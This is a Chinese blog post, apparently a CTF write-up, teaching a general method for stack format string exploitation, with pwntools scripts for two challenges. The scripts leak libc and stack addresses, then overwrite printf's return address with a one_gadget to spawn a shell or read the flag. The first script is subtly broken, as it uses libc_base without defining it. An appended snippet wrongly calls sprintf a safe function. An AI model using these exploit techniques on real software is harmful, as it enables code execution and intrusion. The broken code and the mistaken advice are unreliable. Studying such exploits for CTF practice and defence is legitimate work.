关于在栈上格式化字符串漏洞的利用方法

最新推荐文章于 2024-06-01 22:21:19 发布
最新推荐文章于 2024-06-01 22:21:19 发布
阅读量459 收藏 2
点赞数
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao78777/article/details/129565364
版权

最近做了两个栈上的格式化字符串漏洞题目,发现了一个几乎能任意做此类型题目的方法
就以下面这两个例题来介绍一下这个方法
先说一下这个思路吧,就是通过两次格式化字符串漏洞,第一次泄露libc_base,以及栈里面的一个地址(任意)第二次修改printf的返回地址为one_gadget去getshell

例题一

保护情况:
在这里插入图片描述

主函数:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到可以无限利用格式化字符串漏洞,但是又不会跳出这个循环,所以没法控制主函数的返回地址。
这个题有两种思路,第一种就是通过格式化字符串漏洞任意地址写,把 f 在bss段上的内容改成flag
第二种就是修改printf函数的返回地址为one_gad

这里详细说第二种方法
第一步
泄露libc_base
在这里插入图片描述
泄露__libc_start_main+243的地址再减去243。
然后再随便泄露个栈地址,找到printf的返回地址(进入到printf里就能找到了),以及该地址的栈地址(结尾为91a8的)用你泄露的栈地址让其两者相减,然后就能覆盖成one_gadget
在这里插入图片描述然后找个one_gadget

0xe3afe execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL

用第二个
脚本如下:

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=process('./pwn')
elf=ELF("./pwn")
libc=ELF("libc-2.31.so")

def op(i):
	p.recvuntil("5. Exit\n-------------------------\n")
	p.sendline(str(i))
op(1)
op(3)
p.recvuntil("Please input your notes\n")
pay=b'%21$p'
#gdb.attach(p)
#pause()
p.sendline(pay)
p.recvuntil("Content:\n")

libcstart_addr=int(p.recv(14),16)
print(hex(libcstart_addr))

one_gad=libc_base+0xe3b01
print(hex(one_gad))

op(3)
p.recvuntil("Please input your notes\n")
pay=b'%18$p'
p.sendline(pay)
p.recvuntil("Content:\n")
stack=p.recv(14)
stack_addr=int(stack,16)
print(hex(stack_addr))
addr=stack_addr-0x100
ret_addr=stack_addr-0x60-8-0x100   #可以不断调试以找到正确的返回地址


op(3)
p.recvuntil("Please input your notes\n")
pay=fmtstr_payload(8, {ret_addr:one_gad},write_size='short') #单字节写入字节太大,所以用双字节写入,以满足小于0x50字节
p.sendline(pay)

p.interactive()

在这里插入图片描述
第二种方法

from pwn import *
io = process('./pwn2')

context(arch="amd64",os="linux")
context.log_level = "debug"

csu = 0xE70


def openfile():
    io.recvuntil("-------------------------\n")
    io.sendline(str(1))

def readfile():
    io.recvuntil("-------------------------\n")
    io.sendline(str(2))

def addnotes(notes):
    io.recvuntil("-------------------------\n")
    io.sendline(str(3))
    io.recvuntil("Please input your notes\n")
    io.sendline(notes)
    io.recvuntil("Content:\n",drop=True)

def closefile():
    io.recvuntil("-------------------------\n")
    io.sendline(str(4))

def pwn():
    openfile()
    addnotes(b'%26$p')
    csu_addr = int(io.recvline(keepends=False),16)
    print(hex(csu_addr))
    pie = csu_addr - csu
    filename = pie + 0x0202070
    payload = fmtstr_payload(8,{filename:u32(b'flag')})
    addnotes(payload)
   
    closefile()
    openfile()
    io.recvuntil("You successfully opened the file.\n")
   
    readfile()
    #gdb.attach(io)
    #pause()
    print(io.recv())
    io.interactive()
   
    # io.recvuntil("-------------------------\n")
    # io.sendline(str(3))
    # io.recvuntil("Please input your notes\n")
    # payload = b'\x00'*10
    # gdb.attach(io)
    # pause()
    # io.sendline(payload)


pwn()

在这里插入图片描述
直接读出flag了

例题二

程序比较简单
在这里插入图片描述
保护如下:
在这里插入图片描述

可以看到总共有四次格式化字符串漏洞,前两次是在栈上的格式化字符串漏洞
后两次是bss段上上的格式化字符串漏洞
那么就可以通过前两次格式化字符串漏洞,直接getshell和上题一样,(当然,也可以覆盖变量值,这里不过多说那个方法)

思路也是第一次泄露libc第二次修改printf的返回地址为one_gadget

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p=remote("81.68.77.181",5001)
p=process("./pwn1")
elf=ELF("./pwn1")
libc=ELF("./libc-2.31.so")

p.recvuntil(b"hahah~\n")
pay=b'%19$p,%16$p'
#gdb.attach(p)
#pause()
p.sendline(pay)
#libc_base=u64(p.recv(6).ljust(8,b'\x00'))-243
libc_base=int(p.recv(14),16)-243-libc.sym['__libc_start_main']
p.recv(1)
stack=int(p.recv(14),16)-0x4e-0x10a
print(hex(libc_base))
print(hex(stack))
one_gad=libc_base+0xe3b01

p.recvuntil(b"hahah~\n")
pay=fmtstr_payload(8, {stack:one_gad},write_size='short')
p.send(pay)

p.interactive()

在这里插入图片描述

在这里插入图片描述
使用条件大概就是
1.能执行两次格式化字符串漏洞
2.能读入的字节不少于0x40字节

绿 宝 石
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
栈上格式化字符串漏洞利用
qq_52877079的博客
03-25 334
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
利用格式化字符串漏洞实现任意地址
个人笔记
06-01 3274
理解格式化字符串漏洞关键还是在于理解空间布局,任意地址初学者接触到可能较为抽象,但是结合空间布局以及格式化字符串的原理,详细我们就能对格式化字符串有个更加清晰的认知。如果能够复现上述漏洞案例,那么恭喜你,已经完成了 pwn 格式化字符串漏洞这一旅程。
BUU_SWPUCTF_2019_login非栈上格式化字符串
qq_70452545的博客
04-21 210
对于栈上格式化字符串可以通过直接将对应地址中,然后利用三链对任意地址修改,非栈上也就是不能直接入,利用格式化字符串一样可以修改,只是要麻烦一点。
栈上格式化字符串漏洞修改stack_checkfail
2301_81031055的博客
02-21 239
这一行pay=(b'%7$saaaa'+p64(elf.got['printf'])).ljust(0x100,b'\x00')后面的.ljust(0x100,b'\x00')是因为读入的字节较少,不足以覆盖canary的数值,所以在任意读入较大的数值就行。我们可以利用格式化字符串漏洞去修改stack_chk_fail函数的got表使得程序继续进行,在这里,我们将stack_chk_fail函数改成fmt函数,然后通过格式化字符串漏洞去泄露libc基址。checksec指令查看。用64位IDA打开分析。
栈上格式化字符串漏洞
2302_79813730的博客
02-21 897
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
格式化字符串漏洞自动检测与测试用例生成
04-30
格式化字符串漏洞是一种危害高、影响广的软件漏洞。当前漏洞检测方式存在人工依赖...该方法可自动检测Linux下二进制程序中格式化字符串漏洞的存在性,判定其是否可能导致任意内存读危害,并生成稳定有效的测试用例。
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
04-09
Windows 平台下的堆溢出、格式化字符串漏洞利用技术
C#格式化json字符串方法分析
12-26
本文实例讲述了C#格式化json字符串方法。分享给大家供大家参考,具体如下: 将Json字符串转化成格式化表示的方法: 字符串反序列化为对象–>对象再序列化为字符串 使用Newtonsoft.Json提供的API,下载地址:...
Python字符串格式化方法(两种)
12-25
本文介绍了Python字符串格式化,主要有两种方法,分享给大家,具体如下 用于字符串的拼接,性能更优。 字符串格式化有两种方式:百分号方式、format方式。 百分号方式比较老,而format方式是比较先进的,企图替代...
C语言--printf函数参数出问题
wit_732的博客
07-08 1075
printf函数参数出问题 1.问题 [外链图片转存失败(img-gXBCOQqE-1562567906606)(C:\Users\asus\AppData\Roaming\Typora\typora-user-images\1562566379137.png)] 编译环境为GCC,可一看出结果和我们预想的有很大的区别,那么想一下,为什么会这样? 2.分析 在处理printf时,压...
泄漏libc基地址
最新发布
yjh_fnu_ltn的博客
06-01 960
这里可以利用vulnerable_function函数进行溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
格式化字符串在bss段上的处理
playmaker的博客
06-19 2518
格式化字符串在bss段上的内容处理 先查看程序保护,保护全开 拿到程序一眼就看到了格式化字符串漏洞 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [esp+0h] [ebp-10h] unsigned int v6; // [esp+4h]...
BUUCTF之“SWPUCTF_2019_login”
Probeginner的博客
01-01 1100
格式化字符串在bss段上的情况:间接修改printf.got表为system,,, ebp对应的地址映射比较关键
bss上格式化字符串处理【buuoj】SWPUCTF_2019_login
weixin_46521144的博客
08-10 997
这道题用了两种方法去做,一种是修改got表,零一种是修改返回值控制执行流。 IDA分析 很明显的格式化字符串漏洞,但是是在bss段上 总结一下32位格式化字符串在bss段上的处理方法就是:寻找一个类似ebp的栈上寄存器,如下图 通过修改这个ebp,可以修改上图0xffc78f38的值为想要的(记住:格式化字符串修改栈上指针指向区域的地址,因此是0xffc78f38)如果想要劫持got表,寻找下面80开头的数据(和got表比较相关)修改完后就可以变成下图这样 (思考一下为什么要这么:因为一般的格式化字符
格式化字符串漏洞原理理解
Ttw_
03-16 474
在X86结构下,格式化字符串的参数通过传递,根据cdecl的调用约定,在进入printf函数前,程序将参数从右往左依次压;使用多个%s当作printf的格式化字符串参数即可让程序触发崩溃,原因是%s会让printf从中获取一个数字并将其当作一个地址,当该数字不是一个地址时,或该地址受到保护,都会使程序触发崩溃。攻击者使用类似"%s"的格式规范就可以泄露出参数(指针)所指向内存的数据,如果攻击者可以操纵这个参数的值,那么就可以泄露任意地址的内容。我们可以通过%7$p来打印我们输入的一个双字的内容。
CTF PWN 格式化字符串
VisualNull的博客
06-05 1157
CTF PWN格式化字符串
pwn溢出学习 格式化字符串基本原理
MrTreebook的博客
11-01 377
pwn溢出学习格式化字符串 目录pwn溢出学习格式化字符串1. 格式化字符串简介2. 格式化字符串函数2.1 输入2.2 输出3.格式化字符串的基本原理 1. 格式化字符串简介 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串利用的时候主要分为三个部分 格式
通过实验了解格式化字符串产生的原因,学会利用格式化字符串漏洞泄露和修改栈上的数据。
06-11
格式化字符串漏洞的产生原因是因为程序在使用printf()等格式化输出函数时,没有对格式化字符串进行正确的验证和处理,导致攻击者可以利用格式化字符串中的特殊字符来读取或修改程序内存中的数据。攻击者可以通过修改格式化字符串中的占位符来控制输出的内容,这就是格式化字符串漏洞的基本原理。 下面通过一个简单的例子来介绍如何利用格式化字符串漏洞来泄露和修改栈上的数据: ```c #include <stdio.h> int main(int argc, char **argv) { char buffer[100]; printf("Enter your name: "); scanf("%s", buffer); printf(buffer); return 0; } ``` 在上面的代码中,程序使用了scanf()函数来接收用户输入,然后直接使用printf()函数来输出用户输入的内容,这就导致了格式化字符串漏洞的产生。攻击者可以通过输入一些特殊的字符串来读取或修改程序内存中的数据。 例如,当输入"%x %x %x %x %x %x %x %x %x %x"时,程序会输出栈上的十个值。这是因为"%x"可以将栈上的值以十六进制的形式输出。攻击者可以通过不断尝试来找到栈上存储的敏感信息,如密码、密钥等。 另外,攻击者还可以使用"%n"来修改栈上的数据。例如,当输入"%x %x %x %x %x %x %x %x %x %n"时,程序会将%n之前输出的字符数存储到%n的地址中。攻击者可以通过这种方式来修改程序内存中的数据,实现获取flag的目的。 总之,要避免格式化字符串漏洞,必须对用户输入进行正确的验证和处理,同时避免直接使用格式化输出函数来输出用户输入的内容。如果必须要使用格式化输出函数,可以使用安全格式化函数,如snprintf()、sprintf()等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值